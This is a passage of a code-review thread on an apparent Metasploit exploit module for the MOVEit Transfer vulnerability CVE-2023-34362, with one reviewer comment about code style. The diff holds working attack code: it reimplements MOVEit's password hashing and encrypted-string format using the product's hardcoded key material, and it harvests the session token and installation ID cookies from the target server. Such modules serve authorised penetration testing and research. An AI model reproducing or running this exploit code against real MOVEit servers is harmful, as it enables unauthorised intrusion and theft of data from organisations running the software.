modules/exploits/windows/http/moveit_cve_2023_34362.rb

```diff
@@ -0,0 +1,491 @@
+    fail_with(Msf::Exploit::Failure::BadConfig, 'password cannot be empty') if password.empty?
+    fail_with(Msf::Exploit::Failure::BadConfig, 'salt must be 4 bytes') if salt.length != 4
+
+    # These two hardcoded values are found in MOVEit.DMZ.Core.Cryptography.Providers.SecretProvider.GetSecret
+    pwpre = Base64.decode64('=VT2jkEH3vAs=')
+    pwpost = Base64.decode64('=0maaSIA5oy0=')
+    md5 = Digest::MD5.new
+    md5.update(pwpre)
+    md5.update(salt)
+    md5.update(password)
+    md5.update(pwpost)
+
+    pw = [(4 + 4 + 16), 0, 0, 0].pack('CCCC')
+    pw << salt
+    pw << md5.digest
+
+    return Base64.strict_encode64(pw).gsub('+', '-')
+  end
+
+  def moveitv2encrypt(data, org_key, iv = nil, tag = '@%!')
+    fail_with(Msf::Exploit::Failure::BadConfig, 'org_key must be 16 bytyes') if org_key.length != 16
+
+    if iv.nil?
+      iv = Rex::Text.rand_text_alphanumeric(4)
+      # as we only store the first 4 bytes in the header, the IV must be a repeating 4 byte sequence.
+      iv *= 4
+    end
+
+    # MOVEit.DMZ.Core.Cryptography.Encryption
+    key = [64, 131, 232, 51, 134, 103, 230, 30, 48, 86, 253, 157].pack('C*')
+    key += org_key
+    key += [0, 0, 0, 0].pack('C*')
+
+    # MOVEit.Crypto.AesMOVEitCryptoTransform
+    cipher = OpenSSL::Cipher.new('AES-256-CBC')
+
+    cipher.encrypt
+    cipher.key = key
+    cipher.iv = iv
+    encrypted_data = cipher.update(data) + cipher.final
+    data_sha1_hash = Digest::SHA1.digest(data).unpack('C*')
+    org_key_sha1_hash = Digest::SHA1.digest(org_key).unpack('C*')
+
+    # MOVEit.DMZ.Core.Cryptography.Providers.MOVEit.MOVEitV2EncryptedStringHeader
+    header = [
+      225, # MOVEitV2EncryptedStringHeader
+      0,
+      data_sha1_hash[0],
+      data_sha1_hash[1],
+      org_key_sha1_hash[0],
+      org_key_sha1_hash[1],
+      org_key_sha1_hash[2],
+      org_key_sha1_hash[3],
+      iv.unpack('C*')[0],
+      iv.unpack('C*')[1],
+      iv.unpack('C*')[2],
+      iv.unpack('C*')[3],
+    ].pack('C*')
+
+    # MOVEit.DMZ.Core.Cryptography.Encryption
+    return tag + Base64.strict_encode64(header + encrypted_data)
+  end
+
+  def populate_token_instid
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'connection' => 'keep-alive',
+        'accept' => '*/*'
+      })
+
+      @cookies = res.get_cookies
+      # Get the session id from the cookies
+      if @cookies =~ /ASP.NET_SessionId=([a-z0-9]+);/
+        @moveit_token = ::Regexp.last_match(1)
+        vprint_status("@moveit_token = #{@moveit_token}")
+      else
+        fail_with(Msf::Exploit::Failure::Unknown, 'Could not find token from cookies!')
+      end
+
+      # Get the InstID from the cookies
+      if @cookies =~ /siLockLongTermInstID=([0-9]+);/
+        @moveit_instid = ::Regexp.last_match(1)
+        vprint_status("@moveit_instid = #{@moveit_instid}")
+      else
+        fail_with(Msf::Exploit::Failure::Unknown, 'Could not find InstID from cookies!')
+      end
```

Comment:
The same inversion of logic here would help remove these `else` blocks and simplify things.